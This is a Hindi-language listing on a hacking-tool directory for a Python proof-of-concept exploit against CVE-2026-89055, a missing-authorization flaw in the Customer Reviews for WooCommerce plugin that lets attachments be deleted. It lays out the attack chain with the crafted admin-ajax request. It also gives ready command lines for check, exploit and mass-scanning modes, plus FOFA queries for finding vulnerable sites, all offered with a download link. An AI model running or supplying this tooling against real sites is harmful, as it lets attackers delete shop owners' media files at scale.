Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-89055 — Python check/exploit PoC CVE-2026-89055 के लिए, जो Customer Reviews for WooCommerce में एक unauthenticated authorization bypass है जिससे हमलावर मनमाने Media Library attachments को deletion के लिए link कर सकते हैं। | Kitploit
उपकरण/GitHubGitHub/murrez/cve-2026-89055
टोहीभेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmurrez/cve-2026-89055

CVE-2026-89055

Python check/exploit PoC CVE-2026-89055 के लिए, जो Customer Reviews for WooCommerce में एक unauthenticated authorization bypass है जिससे हमलावर मनमाने Media Library attachments को deletion के लिए link कर सकते हैं।

रिपॉजिटरी देखें
8घं 8मि पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-89055 — Customer Reviews for WooCommerce (CusRev) प्राधिकरण बायपास

Customer Reviews for WooCommerce (customer-reviews-woocommerce / Ivole CusRev) में CVE-2026-89055 के लिए Python 3 PoC।

विवरण (PoCbit / GitHub)

CVE-2026-89055 — Customer Reviews for WooCommerce (CusRev) ≤ 5.120.0 सार्वजनिक local review form AJAX हैंडलर (cr_local_forms_submit) पर अनुपस्थित प्राधिकरण के प्रति संवेदनशील है। कोई भी व्यक्ति जिसके पास customer review link (/cusrev/{13-hex formId}/ पोस्ट-ऑर्डर ईमेल से) है, एक वैध crSubmitNonce प्राप्त कर सकता है और ऐसी समीक्षाएँ सबमिट कर सकता है जिनकी items[].media सरणी में मनमानी Media Library attachment IDs (उत्पाद छवियाँ, लोगो, PDFs, आदि) हो सकती हैं। वे IDs समीक्षा टिप्पणी मेटा में संग्रहीत होती हैं; जब समीक्षा स्थायी रूप से हटा दी जाती है (ट्रैश पर्ज / स्पैम क्लीनअप), delete_review_media_attachments() प्रत्येक लिंक किए गए ID पर स्वामित्व जाँच के बिना wp_delete_attachment() को कॉल करता है। CVSS 3.1 9.1 Critical (C:N/I:H/A:H)। > 5.120.0 में ठीक किया गया।

PoCbit

समुदाय कैटलॉग: https://pocbit.org/pocs/

हमला श्रृंखला

  1. {site}/cusrev/{formId}/ खोलें → crSubmitNonce + उत्पाद data-itemid मान पढ़ें।
  2. admin-ajax.php पर POST करें: action=cr_local_forms_submit के साथ items[n][media][]=<victim_attachment_id>।
  3. प्लगइन WooCommerce समीक्षा टिप्पणी मेटा (ivole_reviews_locl_img / वीडियो) बनाता/अपडेट करता है।
  4. जब समीक्षा टिप्पणी स्थायी रूप से हटा दी जाती है, हुक किया गया delete_review_media_attachments प्रत्येक लिंक किए गए attachment फ़ाइल को हटा देता है।

यह PoC अधिकृत लक्ष्यों पर चरण 1–2 करता है। चरण 4 एक साइट/एडमिन जीवनचक्र घटना है (आउटपुट में chain_note के रूप में दस्तावेज़ित करें)।

आवश्यकताएँ

root@kitploit:~
pip install -r requirements.txt

Python 3.8+।

उपयोग

root@kitploit:~
# Plugin version + optional live form (nonce + item IDs)
python poc.py -u https://shop.example --mode check --form-url /cusrev/abc123def4567/

# Inject foreign attachment ID into first product line item
python poc.py -u https://shop.example --mode exploit \
  --form-id abc123def4567 --attachment-id 123 \
  --verify-url https://shop.example/wp-content/uploads/2026/01/product.jpg

# Mass: base URL per line, optional form path after |
python poc.py --list targets.example.txt --mode check -j 20 --quiet

आउटपुट

FileMeaning
cve_2026_89055_results.jsonlप्रति-लक्ष्य JSON
hits.txtउम्मीदवार या exploit मार्कर
candidates.jsonlफ़ॉर्म लिंक की आवश्यकता वाले Plugin-vuln होस्ट

FOFA

root@kitploit:~
body="/wp-content/plugins/customer-reviews-woocommerce/"
body="/cusrev/"

कानूनी

केवल अधिकृत परीक्षण।

टूल डाउनलोड करें
PlatformWordPress + WooCommerce
PluginCustomer Reviews for WooCommerce
Affected≤ 5.120.0
CWECWE-862 (Missing Authorization)
Prerequisiteसार्वजनिक /cusrev/{formId}/ लिंक (पृष्ठ पर nonce)
Impactसमीक्षा पर्ज के बाद मनमानी मीडिया विलोपन (अखंडता + उपलब्धता)